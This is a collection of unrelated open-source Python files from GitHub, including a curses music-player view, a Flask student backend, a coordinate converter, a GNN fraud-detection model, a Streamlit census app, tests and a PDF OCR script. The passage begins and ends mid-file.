line(self, string, y, slen, width=None, color='white'):\n if width is None:\n width = self.width\n\n self.scr.addnstr(y, 0, string, width, self.colors.get(color))\n for i in range(slen, width):\n self.scr.addstr(y, slen, ' ')\n\n slen += 1\n\n def clear(self):\n self.scr.clear()\n\n def erase(self):\n self.scr.erase()\n\n def refresh(self):\n self.scr.refresh()\n\n def resize(self):\n self.width, self.heigth = self.scr.getmaxyx()\n self.viewheight = self.height - self.header_height - self.footer_height\n\n def set_item(self, item):\n self.item = item\n if isinstance(self.current, List):\n self.current_item = self.current.items[item]\n elif isinstance(self.current, Playlist):\n self.current_item = self.current.tracks[item]\n elif isinstance(self.current, Artist):\n self.current_item = self.current.albums[item]\n elif isinstance(self.current, list):\n self.current_item = self.current[item]\n elif isinstance(self.current, tuple):\n self.current_item = self.current[1][item]\n\n def back(self):\n self.current = self.previous[-1][0]\n self.set_item(self.previous[-1][1])\n self.previous.pop()\n\n def enter(self):\n if isinstance(self.current_item, Track):\n return\n\n self.previous.append((self.current, self.item))\n\n self.current = self.current_item\n self.set_item(0)\n","repo_name":"sdispater/melomaniac","sub_path":"melomaniac/ui/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10231,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"5"} +{"seq_id":"4138321416","text":"\r\nfrom os import remove\r\nfrom flask import Flask, request\r\nfrom flask.json import jsonify\r\nfrom flask_cors import CORS\r\nfrom Manager import Adminstrador\r\nfrom xml.etree import ElementTree as ET\r\n\r\napp = Flask(__name__)\r\napp.config[\"DEBUG\"]=True\r\n\r\nCORS(app)\r\n\r\n\r\n\r\nadmin = Adminstrador()\r\n\r\n@app.route('/')\r\ndef home():\r\n return \"Esto funciona :D\"\r\n\r\n@app.route('/recibir', methods=['GET'])\r\ndef imprimir():\r\n if request.method == 'GET':\r\n mensajes2 = []\r\n diccionario = {}\r\n for mensaje in admin.mensajes:\r\n diccionario = {\r\n 'lugar' : mensaje.lugar,\r\n 'fecha' : mensaje.fecha,\r\n 'hora' : mensaje.hora,\r\n 'usuario' : mensaje.user,\r\n 'red' : mensaje.red,\r\n 'empresa' : mensaje.empresa,\r\n 'servicio' : mensaje.servicio,\r\n 'contenido' : ' '.join(mensaje.contenido),\r\n 'tipo' : mensaje.tipo\r\n }\r\n mensajes2.append(diccionario)\r\n return jsonify({'ok':True}, mensajes2)\r\n\r\n#Cargar Archivo\r\n@app.route('/CargaMasiva',methods=['POST'])\r\ndef Carguita():\r\n xml=request.data.decode('utf-8')\r\n admin.recibirXML(xml)\r\n admin.clasificacionMensajes()\r\n return (jsonify({'ok':True}))\r\n\r\n#-------> inicio endpoints\r\n\r\n@app.route(\"/CargaMasiva\", methods=[\"GET\"])\r\ndef Carguita2():\r\n try:\r\n file = open('BaseDatos.xml', 'r')\r\n admin.recibirXML(file.read())\r\n admin.clasificacionMensajes()\r\n return jsonify({'ok':True, 'msg': admin.salidaXML()}), 200\r\n except:\r\n return ({'ok':False, 'msg': 'Algo ocurrió'})\r\n\r\n@app.route('/reset',methods=['POST'])\r\ndef reset():\r\n admin.mensajes = []\r\n admin.empresas = []\r\n admin.xml = []\r\n admin.totalMensajes =0\r\n admin.totalPositivos = 0\r\n admin.totalNegativos = 0\r\n admin.totalNeutros = 0\r\n admin.nose = []\r\n admin.reporte2 = {}\r\n admin.reporte3 = {}\r\n admin.reporte4 = []\r\n remove(\"BaseDatos.xml\")\r\n return(jsonify({'ok': True, 'msg':'Reseteo con éxito :D'})), 200\r\n\r\n\r\n@app.route(\"/CargaMasiva\", 
methods=[\"GET\"])\r\ndef MostrarSalida():\r\n return ({'ok':False}),200\r\n\r\n\r\n@app.route(\"/peticiones\", methods=[\"GET\"] )\r\ndef MostrrPetciones ():\r\n if len(admin.empresas) > 0:\r\n return jsonify({'data':True}), 200\r\n else:\r\n return jsonify({'data':False})\r\n\r\n@app.route('/consultar', methods=['GET'])\r\ndef consultar():\r\n entrada = admin.xml\r\n salida = admin.salidaXML()\r\n data = {\r\n 'entrada' : entrada,\r\n 'salida': salida\r\n }\r\n return jsonify(data)\r\n\r\n@app.route('/clasificar-por-fecha', methods = ['GET','POST'])\r\ndef clasificar():\r\n if request.method == 'GET':\r\n #json = request.get_json()\r\n empresas2 = []\r\n for em in admin.empresas:\r\n empresas2.append(em.nombre) \r\n return jsonify ({'empresas':empresas2}) #--> solo nombre de empresas\r\n\r\n if request.method == 'POST':\r\n datos = request.json\r\n dictionary = admin.clasificacionFecha(datos['date'], datos ['empresa'])\r\n print(dictionary)\r\n return jsonify(dictionary)\r\n\r\n@app.route('/resumen-por-rango', methods = ['GET','POST'])\r\ndef rango():\r\n #Si solo es un get, entondes retornara un listado de empresa para seleccionar\r\n if request.method == 'GET':\r\n #json = request.get_json()\r\n empresas2 = []\r\n for em in admin.empresas:\r\n empresas2.append(em.nombre)\r\n #Rettorna solo los nombre de las empresas\r\n return jsonify ({'empresas':empresas2})\r\n #Si es un post, entonces retornara los mensajes totales\r\n if request.method == 'POST':\r\n datos = request.json\r\n dictionary = admin.clasificacionRango_Fecha(datos['date1'],datos['date1'] , datos ['empresa'])\r\n print(dictionary)\r\n return jsonify(dictionary)\r\n\r\n\r\n@app.route('/generarPDF1', methods = ['POST'])\r\ndef pdf1():\r\n if request.method == \"POST\":\r\n\r\n entrada = admin.xml\r\n salida = admin.salidaXML()\r\n data = {\r\n 'entrada' : entrada,\r\n 'salida': salida\r\n }\r\n\r\n return jsonify(data)\r\n\r\n\r\n\r\n@app.route(\"/reporte2\", methods = ['POST'])\r\ndef reporte2 ():\r\n return jsonify(admin.reporte2)\r\n\r\n@app.route(\"/reporte3\", methods = ['POST'])\r\ndef reporte3 ():\r\n return jsonify(admin.reporte3)\r\n\r\n@app.route(\"/reporte4\", methods = ['POST'])\r\ndef reporte4():\r\n #Se define la entrada como el XML enviado, pero lasalida como una funcion que procesa\r\n entrada = admin.nose\r\n salida = admin.reporte4\r\n data = {\r\n 'entrada' : entrada,\r\n 'salida': salida\r\n }\r\n data = jsonify(data)\r\n return data\r\n \r\n@app.route(\"/prueba-de-mensaje\", methods = ['GET'])\r\ndef prueba1():\r\n return jsonify({'ok':'True'})\r\n\r\n@app.route(\"/prueba-de-mensaje\", methods = ['POST'])\r\ndef prueba2():\r\n xml2 = request.data.decode('utf-8')\r\n admin.prueba_mensaje(xml2)\r\n entrada = str(xml2)\r\n admin.reporte40 = entrada\r\n salida = admin.prueba_mensaje(xml2)\r\n return jsonify({'entrada':entrada, 'salida':salida})\r\n\r\n@app.route(\"/ayuda\", methods = ['GET'])\r\ndef MostrarAyuda():\r\n return jsonify({'1. Nombre':'Christian Alessander Blanco González',\r\n '2. 
    return jsonify({'1. Nombre':'Christian Alessander Blanco González',\r\n                    '2. Carnet': 202000173,\"Documentacion\" : False})\r\n\r\n    \r\n\r\n# Start the server\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True, port=4000) ","repo_name":"KritianWhite/IPC2_Proyecto3_202000173","sub_path":"Backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"es","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"25653312640","text":"import math\n\ndef xyz2llh(x,y,z):\n    # --- WGS84 constants\n    a = 6378137.0\n    f = 1.0 / 298.257223563\n    # --- derived constants\n    b = a - f*a\n    e = math.sqrt(math.pow(a,2.0)-math.pow(b,2.0))/a\n    clambda = math.atan2(y,x)\n    p = math.sqrt(pow(x,2.0)+pow(y,2))\n    h_old = 0.0\n    # first guess with h=0 meters\n    theta = math.atan2(z,p*(1.0-math.pow(e,2.0)))\n    cs = math.cos(theta)\n    sn = math.sin(theta)\n    N = math.pow(a,2.0)/math.sqrt(math.pow(a*cs,2.0)+math.pow(b*sn,2.0))\n    h = p/cs - N\n    while abs(h-h_old) > 1.0e-6:\n        h_old = h\n        theta = math.atan2(z,p*(1.0-math.pow(e,2.0)*N/(N+h)))\n        cs = math.cos(theta)\n        sn = math.sin(theta)\n        N = math.pow(a,2.0)/math.sqrt(math.pow(a*cs,2.0)+math.pow(b*sn,2.0))\n        h = p/cs - N\n    Rad2Deg = 180.0 / math.pi\n    return clambda * Rad2Deg, theta * Rad2Deg, h","repo_name":"jorialand/gnss_jorialand_wp0_receiver_analysis","sub_path":"SRC/COMMON/Coordinates.py","file_name":"Coordinates.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"37430791692","text":"'''\nGiven a linked list, remove the n-th node from the end of list and return its head.\n\nExample:\n\nGiven linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nGiven n will always be valid.\n\nFollow up:\n\nCould you do this in one pass?\n'''\n\n'''\nSolution 1: Get the length of the linked list first, then walk length-n-1 steps so that you stop just before the target element. We want to stop just before it so that we can point its predecessor's next pointer past it and essentially \"erase\" that node.\nSolution 2: There is apparently a one-pass solution for this, but the LC community begs to differ. Since they seem to not agree with the one-pass solution I'm not gonna do it here. 
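\nFor reference, here is a hedged outline of the usual one-pass, two-pointer idea (a sketch, not this file's tested code):\n\n    fast = slow = head\n    for _ in range(n):\n        fast = fast.next              # fast leads slow by n nodes\n    if fast is None:\n        return head.next              # head itself is the n-th from the end\n    while fast.next:\n        fast, slow = fast.next, slow.next\n    slow.next = slow.next.next        # slow stops just before the target; unlink it\n    return head\n\n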
You can look at the solution on lc to see it.\n'''\n\n\ndef removeNthFromEnd(self, head, n):\n lenOfList = 0\n dummy = head # keep a pointer to the head otherwise you\n\n while dummy: # get length of list\n dummy = dummy.next\n lenOfList += 1\n\n ans = head\n\n if lenOfList == n: # the below for loop does not work if the length of the list is the size of n\n return head.next\n\n for i in range(lenOfList-n-1): # this stops 1 index before n\n ans = ans.next\n\n if ans.next.next: # make sure we can overwrite the deleted node with its next\n ans.next = ans.next.next\n else: # the deleted node is at the end of the list\n ans.next = None\n\n return head\n","repo_name":"EddyYeung1/Top-75-LC-Questions","sub_path":"Solutions/Remove_Nth_LL.py","file_name":"Remove_Nth_LL.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"19920005446","text":"nums = list(input().split())\n\ndef average(nums):\n sum = 0\n for i in nums:\n sum += int(i)\n average = sum / len(nums)\n return average\n\ndef biggest(nums):\n big = int(0)\n for i in nums:\n if int(i) > int(big):\n big = i\n return big\n\nprint('{:.0f} {}'.format(average(nums), biggest(nums)))\n","repo_name":"jamesnatcher/Old-Python-Stuff","sub_path":"CS 101/CS 101 Labs**/outputs the max and average of a list of inputs.py","file_name":"outputs the max and average of a list of inputs.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1111573772","text":"import os\nimport sys\nsys.path.append(os.path.abspath(\"../megastore-app/backend\"))\n\nfrom app.db.Session import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n","repo_name":"zopeaj/megastore-app","sub_path":"backend/app/db/get_db.py","file_name":"get_db.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74542331672","text":"\"\"\"\nThis code is due to Zhiqin Yang (@visitworld123) Yutong Deng (@yutongD),\nYingtong Dou (@YingtongDou) and UIC BDSC Lab\nDGFraud (A Deep Graph-based Toolbox for Fraud Detection in TensorFlow 2.X)\nhttps://github.com/safe-graph/DGFraud-TF2\n\nPaper: 'Heterogeneous Graph Neural Networks for Malicious Account Detection'\nLink: https://arxiv.org/pdf/2002.12307.pdf\n\"\"\"\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), '../..')))\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom layers.layers import GEMLayer\n\nfrom utils.metrics import accuracy\n\n\nclass GEM(keras.Model):\n\n def __init__(self, input_dim, output_dim, args):\n super().__init__()\n\n self.nodes_num = args.nodes_num\n self.class_size = args.class_size\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.device_num = args.device_num\n self.hop = args.hop\n self.zero_init = tf.keras.initializers.Zeros()\n self.h_0 = tf.Variable(\n initial_value=self.zero_init(\n shape=(self.nodes_num, self.output_dim),\n dtype=tf.float32)\n )\n\n # GEM layers initialization\n self.layers_ = []\n self.input_layer = GEMLayer(self.nodes_num, self.input_dim,\n self.output_dim, self.device_num)\n for _ in range(self.hop - 1):\n self.layers_.append(\n GEMLayer(self.nodes_num, self.input_dim, self.output_dim,\n self.device_num))\n\n # logistic weights initialization\n self.x_init = tf.keras.initializers.GlorotUniform()\n self.u 
= tf.Variable(\n initial_value=self.x_init(shape=(self.output_dim, self.class_size),\n dtype=tf.float32), trainable=True)\n\n def call(self, inputs):\n\n \"\"\":param inputs include support, x, label, mask\n support means a list of the sparse adjacency Tensor\n x means feature\n label means label tensor\n mask means a list of mask tensors to obtain the train data\n \"\"\"\n\n supports, x, label, idx_mask = inputs\n\n # forward propagation\n outputs = [self.input_layer((x, supports, self.h_0))]\n for layer in self.layers_:\n hidden = layer((x, supports, outputs[-1]))\n outputs.append(hidden)\n gem_out = outputs[-1]\n\n # get masked data\n masked_data = tf.gather(gem_out, idx_mask)\n masked_label = tf.gather(label, idx_mask)\n\n # Eq. (7) in paper\n logits = tf.nn.softmax(tf.matmul(masked_data, self.u))\n loss = -tf.reduce_sum(\n tf.math.log(tf.nn.sigmoid(masked_label * logits)))\n acc = accuracy(logits, masked_label)\n\n return loss, acc\n","repo_name":"safe-graph/DGFraud-TF2","sub_path":"algorithms/GEM/GEM.py","file_name":"GEM.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"5"} +{"seq_id":"13172221048","text":"\n\nimport openpyxl\nfrom openpyxl import Workbook\n\n# print(new_sheet.max_row)\nclass datainput():\n\n @staticmethod\n def handling():\n\n Dict = {}\n\n path = \"C:\\\\Users\\\\Sathe\\\\PycharmProjects\\\\pythonProject1\\\\Pythonclass\\\\Pytestconcept\\\\Input file\\\\input file.xlsx\"\n\n new_book = openpyxl.load_workbook(path)\n\n Sheet = new_book.active\n # data = new_sheet.cell(row =1 ,column=1)\n # print(data.value)\n max_row = Sheet.max_row\n max_col = Sheet.max_column\n # # print(new_sheet.max_column)\n # for row in range(1,(max_row)+1):\n # for column in range(1,(max_col)+1):\n # cell_value = new_sheet.cell(row = row,column=column).value\n\n for i in range(2, max_row + 1):\n for j in range(1, max_col + 1):\n Dict[(Sheet.cell(row=1, column=j).value)] = Sheet.cell(row=i, column=j).value\n #print(dict)\n return Dict\n\nobj = datainput()\nobj.handling()","repo_name":"Satheeshtest94/pythonfiles","sub_path":"Pytestconcept/Utils/excelinput.py","file_name":"excelinput.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21891153869","text":"# Open Sublime text editor, create a new Python file, copy the following code in it and save it as 'census_app.py'.\r\n\r\n# Import modules\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport streamlit as st\r\n\r\n@st.cache()\r\ndef load_data():\r\n\t# Load the Adult Income dataset into DataFrame.\r\n\r\n\tdf = pd.read_csv('https://student-datasets-bucket.s3.ap-south-1.amazonaws.com/whitehat-ds-datasets/adult.csv', header=None)\r\n\tdf.head()\r\n\r\n\t# Rename the column names in the DataFrame using the list given above. \r\n\r\n\t# Create the list\r\n\tcolumn_name =['age', 'workclass', 'fnlwgt', 'education', 'education-years', 'marital-status', 'occupation', 'relationship', 'race','gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income']\r\n\r\n\t# Rename the columns using 'rename()'\r\n\tfor i in range(df.shape[1]):\r\n\t df.rename(columns={i:column_name[i]},inplace=True)\r\n\r\n\t# Print the first five rows of the DataFrame\r\n\tdf.head()\r\n\r\n\t# Replace the invalid values ' ?' 
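(note the leading space in ' ?', as stored in the raw CSV)\r\n\t# A hedged one-liner alternative (an assumption; same effect for all three columns):\r\n\t#   df = df.replace(' ?', np.nan)\r\n\t# Below, each affected column is replaced 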
with 'np.nan'.\r\n\r\n\tdf['native-country'] = df['native-country'].replace(' ?',np.nan)\r\n\tdf['workclass'] = df['workclass'].replace(' ?',np.nan)\r\n\tdf['occupation'] = df['occupation'].replace(' ?',np.nan)\r\n\r\n\t# Delete the rows with invalid values and the column not required \r\n\r\n\t# Delete the rows with the 'dropna()' function\r\n\tdf.dropna(inplace=True)\r\n\r\n\t# Delete the column with the 'drop()' function\r\n\tdf.drop(columns='fnlwgt',axis=1,inplace=True)\r\n\r\n\treturn df\r\n\r\ncensus_df = load_data()\r\n\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\nst.title(\"Census App\")\r\nst.sidebar.title(\"Graphs\")\r\n\r\nif st.sidebar.checkbox(\"Show Raw Data\"):\r\n\tst.dataframe(census_df)\r\n\r\n#st.sidebar.multiselect(\"Visualisations:\" , )\r\nst.sidebar.subheader(\"Visualisation Selector\")\r\n\r\nplot_list = st.sidebar.multiselect(\"Select Chart/Plots:\" , (\"Piechart\" , \"Boxplot\" , \"Countplot\"))\r\n\r\nif \"Piechart\" in plot_list:\r\n\tst.title(\"Piechart for Income Type\")\r\n\tplt.figure(figsize = (20,5))\r\n\tplt.pie(census_df[\"income\"].value_counts() , labels = census_df[\"income\"].value_counts().index, autopct = \"%1.2f%%\")\r\n\tst.pyplot()\r\nif \"Piechart\" in plot_list:\r\n\tst.title(\"Piechart for Gender Type\")\r\n\tplt.figure(figsize = (20,5))\r\n\tplt.pie(census_df[\"gender\"].value_counts() , labels = census_df[\"gender\"].value_counts().index, autopct = \"%1.2f%%\")\r\n\tst.pyplot()\r\nif \"Boxplot\" in plot_list:\r\n st.title(\"BoxPlots for different income groups\")\r\n plt.figure(figsize = (10,10))\r\n sns.boxplot(x = census_df[\"hours-per-week\"] , y = census_df[\"income\"])\r\n st.pyplot()\r\nif \"Boxplot\" in plot_list:\r\n st.title(f\"Box Plot for different gender groups\")\r\n plt.figure(figsize = (10,10))\r\n sns.boxplot(x = census_df[\"hours-per-week\"] , y = census_df[\"gender\"])\r\n st.pyplot()\r\nif \"Countplot\" in plot_list:\r\n st.title(\"Countplot for workclass\")\r\n\r\n plt.figure(figsize = (20,10))\r\n sns.countplot(census_df[\"workclass\"] , hue = census_df[\"income\"])\r\n\r\n\r\n st.pyplot()\r\n","repo_name":"Saimuthsa/Projects","sub_path":"census_app_project_95.py","file_name":"census_app_project_95.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34480187183","text":"import requests\nfrom zipfile import ZipFile\nfrom io import BytesIO\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nfrom datetime import datetime\nfrom io import StringIO\n\nfrom airflow.decorators import dag, task\nfrom airflow.operators.python import get_current_context\nfrom airflow.models import Variable\n\n\ndefault_args = {\n 'owner': 'n-baldina-24',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 10, 9)\n}\nschedule_interval = '0 12 * * *'\n\n@dag(default_args=default_args, catchup=False, schedule_interval=schedule_interval)\ndef nbaldina_games():\n @task(retries=3)\n def get_data():\n year = 1994 + hash(f'n-baldina-24') % 23\n games = pd.read_csv('/var/lib/airflow/airflow.git/dags/a.batalov/vgsales.csv')\n games_2013 = games.query('Year == @year')\n return games_2013\n\n @task(retries=4, retry_delay=timedelta(10))\n def get_global_game(games_2013):\n global_game = games_2013.groupby('Name') \\\n .agg({'Global_Sales': 'sum'}) \\\n .sort_values('Global_Sales', ascending=False) \\\n .idxmax()\n return global_game\n\n @task()\n def 
get_top_5_eu_genre(games_2013):\n        top_5_eu_genre = games_2013.groupby('Genre') \\\n            .agg({'EU_Sales': 'sum'}) \\\n            .sort_values('EU_Sales', ascending=False) \\\n            .head()\n        return top_5_eu_genre\n\n    @task()\n    def get_platform_NA(games_2013):\n        platform_NA = games_2013.query('NA_Sales>=1') \\\n            .groupby('Platform', as_index=False) \\\n            .agg({'Name': 'nunique'}) \\\n            .sort_values('Name', ascending=False)\n        platform_NA = platform_NA.Platform.to_list()\n        return platform_NA\n\n    @task()\n    def get_publisher_jp(games_2013):\n        publisher_jp = games_2013.groupby('Publisher') \\\n            .agg({'JP_Sales': 'mean'}) \\\n            .idxmax()\n        return publisher_jp\n    \n    @task()\n    def get_eu_over_jp(games_2013):\n        tab_eu = games_2013.groupby('Name', as_index=False) \\\n            .agg({'EU_Sales': 'sum'})\n        tab_jp = games_2013.groupby('Name', as_index=False) \\\n            .agg({'JP_Sales': 'sum'})\n        tab = tab_eu.merge(tab_jp, on='Name', how='inner')\n        tab['diff'] = tab['EU_Sales'] - tab['JP_Sales']\n        eu_over_jp = tab.query('diff>0').Name.nunique()\n        return eu_over_jp\n\n    @task()\n    def print_data(global_game, top_5_eu_genre, platform_NA, publisher_jp, eu_over_jp):\n\n        print('Which game was the best-selling worldwide that year?')\n        print(global_game)\n        print('Games of which genre sold best in Europe? List all of them if there are several')\n        print(top_5_eu_genre)\n        print('Which platform had the most games that sold over a million copies in North America? List all of them if there are several')\n        print(platform_NA)\n        print('Which publisher has the highest average sales in Japan? List all of them if there are several')\n        print(publisher_jp)\n        print('How many games sold better in Europe than in Japan?')\n        print(eu_over_jp)\n\n    games_2013 = get_data()\n    global_game = get_global_game(games_2013)\n    top_5_eu_genre = get_top_5_eu_genre(games_2013)\n    platform_NA = get_platform_NA(games_2013)\n    publisher_jp = get_publisher_jp(games_2013)\n    eu_over_jp = get_eu_over_jp(games_2013)\n\n    print_data(global_game, top_5_eu_genre, platform_NA, publisher_jp, eu_over_jp)\n\nnbaldina_games = nbaldina_games()","repo_name":"ageichev/Portfolio","sub_path":"Jupiter notebook/mnt/HC_Volume_18315164/home-jupyter/jupyter-a-a-30/airflow/dags/n-baldina-24/nbaldina_lesson_3.py","file_name":"nbaldina_lesson_3.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4007434184","text":"import pytest\n
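# (added note) 'file_manger' below is presumably the project's own module spelling;\n# it is deliberately left as-is, since \"correcting\" the name would break the import.\n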
from . import context\nfrom file_manger import read_cache, write_cache\nfrom data_types import Game\nfrom datetime import date as Date\n\n\n@pytest.fixture\ndef sample_games():\n    games = [\n        Game(\"Rutgers\", \"Princeton\", 6, 4, Date(1869, 11, 6)),\n        Game(\"Princeton\", \"Rutgers\", 8, 0, Date(1869, 11, 13))\n    ]\n    return games\n\n\n@pytest.fixture\ndef sample_years():\n    years = [1869]\n    return years\n\n\ndef test_read_cache(sample_games, sample_years):\n    input_file = 'test/data/sample_cache.json'\n    games, years = read_cache(input_file)\n    assert games == sample_games\n    assert years == sample_years\n\n\ndef test_write_cache(sample_games, sample_years):\n    output_file = 'test/data/cache_output.json'\n    input_file = 'test/data/sample_cache.json'\n    write_cache(output_file, sample_games, sample_years)\n\n    expected = ''\n    with open(input_file, 'r') as fp:\n        expected = fp.read()\n\n    result = ''\n    with open(output_file, 'r') as fp:\n        result = fp.read()\n\n    assert result == expected\n","repo_name":"jklypchak13/CFB_Scorigami","sub_path":"test/test_file_manager.py","file_name":"test_file_manager.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41365650962","text":"# Python multiprocessing package provides API for process communication and management.\n# This demo demonstrates creating a worker pool and offloading jobs.\n# Processes communicate through shared memory (POSIX).\nimport multiprocessing as mp\nimport time\n\ndef job():\n    print(1)\n\nstart = time.time()\n\nif __name__ == '__main__':\n    mp.set_start_method('spawn')\n    pool = mp.Pool(processes=4)\n    for i in range(4):\n        pool.apply(job)\n    print(\"total time {}\".format(time.time() - start))\n\n","repo_name":"occlum/occlum","sub_path":"demos/python/python_glibc/python3.10-multiprocessing/multiprocessing_demo.py","file_name":"multiprocessing_demo.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1238,"dataset":"github-code","pt":"5"} +{"seq_id":"30822500127","text":"import os\nimport sys\nimport cv2\nfrom PyPDF2 import PdfReader ,PdfMerger\nfrom pdf2image import convert_from_path\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport pyocr\nimport re\nimport json\n\ndef isfloat(s): # check whether the string represents a floating-point number\n    try:\n        float(s) # actually try converting the string with float()\n    except ValueError:\n        return False\n    else:\n        return True\n\n\n\n# get an OCR engine\ntools = pyocr.get_available_tools()\nif len(tools) == 0:\n    print(\"No OCR engine is available\")\n    sys.exit(1)\nelse:\n    tool = tools[0]\n# print(text)\npdfFileName = \"サンプル計算書(1).pdf\"\ndpi0 = 600 # DPI when reading numeric values\ndpi1 = 200 # DPI used when rendering the output\ndpi2 = 600 # DPI when reading the (Japanese) page titles\nCdpi = dpi0 / dpi1 # DPI ratio used when mapping detections onto the output\n\nLineW = 2\nTx = int(10 * dpi1 / 25.4)\nTy = int(10 * dpi1 / 25.4)\n\n\njsonFileName = \"sample.json\"\nif os.path.isfile(jsonFileName):\n    json_open = open(jsonFileName, 'r')\n    json_load = json.load(json_open)\n    titles = json_load['item']\n    pageNumber = json_load['page']\nelse:\n    # Japanese page headings to match: the section-check-ratio diagram (short-term load)\n    # and the column / beam / wall section check tables. Kept verbatim, since they are\n    # compared against OCR'd Japanese text.\n    titles = [[\"断面検定比図\",\"短期荷重時\"],[\"柱の断面検定表\"],[\"梁の断面検定表\"],[\"壁の断面検定表\"]]\n    with open(pdfFileName, \"rb\") as input:\n        reader = PdfReader(input)\n        PageMax = len(reader.pages)\n\n    PageMax = 300 # hard cap (overrides the real page count)\n    # how many pages does the PDF have?\n    print(\"サンプル計算書(1).pdf has %d pages.\\n\" % PageMax)\n    pageNumber = []\n    for i in range(len(titles)):\n        pageNumber.append([])\n\n    for i in range(PageMax):\n        if i > 10:\n            images = convert_from_path(pdfFileName,dpi=dpi2,first_page=i+1,last_page=i+1)\n
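            # (added note) Only a crop around the title band (roughly x: 66-92%,\n            # y: 5-12.5% of the page) is OCR'd below, to classify each page by its heading.\n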
            image = images[0]\n            img = np.array(image)\n            h , w = img.shape[:2]\n            split_pic=img[int(h*0.05):int(h*0.125),int(w*0.66):int(w*0.92),:]\n            # plt.imshow(cv2.cvtColor(split_pic, cv2.COLOR_BGR2RGB))\n            # plt.show()\n            image2 = Image.fromarray(split_pic)\n\n            # box_builder = pyocr.builders.TextBuilder(tesseract_layout=6)\n            box_builder = pyocr.builders.TextBuilder()\n            text = tool.image_to_string(image2,lang=\"jpn\",builder=box_builder)\n            # strip whitespace and fix a common OCR misread (染 -> 梁, \"beam\")\n            text = text.replace(\" \",\"\").replace(\" \",\"\").replace(\"\\t\",\"\").replace(\"\\n\",\"\").replace(\"染\",\"梁\")\n            print(text)\n            print(i+1)\n            j = 0\n            for title in titles:\n                b = title[0] in text\n                if len(title)>1 :\n                    for k in range(len(title)-1):\n                        b = b and title[k+1] in text\n                if b:\n                    pageNumber[j].append(i+1)\n                j += 1\n\n    pageData = {\"item\":titles,\"page\":pageNumber}\n    # data_json = json.dumps(pageData, indent=4, ensure_ascii=False)\n    with open('sample.json', 'w') as fp:\n        json.dump(pageData, fp, indent=4, ensure_ascii=False)\n\nstart_page = min(pageNumber[0])\nend_page = max(pageNumber[0])\n# load the data for the selected page range\nimages = convert_from_path(pdfFileName,dpi=dpi0,first_page=start_page,last_page=end_page)\nOut_image2 = convert_from_path(pdfFileName,dpi=dpi1,first_page=start_page,last_page=end_page)\n\n\n# img_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n# retval, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\npdf_file_merger = PdfMerger()\n\nno = 0\nTotal_Contents = []\nTotal_Positions = []\nTotal_PointN = []\n\nfor image in images:\n    no += 1\n    print(\"page {0}\".format(no))\n    print()\n    img = np.array(image)\n    img2 = img\n    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n    plt.show()\n\n    # convert to grayscale (pre-processing before binarization)\n    img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    # binarization: reduce to a simple black(0)/white(1) two-level image\n    retval, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n    # plt.imshow(img_binary)\n    print('[Detecting straight lines...] binarized image - Binarization')\n    # plt.imshow(cv2.cvtColor(img_binary, cv2.COLOR_BGR2RGB))\n    # plt.show()\n\n    lines = cv2.HoughLinesP(img_binary, rho=1, theta=np.pi/360, threshold=15, minLineLength=60, maxLineGap=5.4)\n\n    
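# (added note) HoughLinesP: rho/theta set the accumulator's distance (px) and angle (rad)\n    # resolution; 'threshold' is the minimum vote count for a line; segments shorter than\n    # minLineLength are discarded and collinear gaps up to maxLineGap pixels are bridged.\n    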
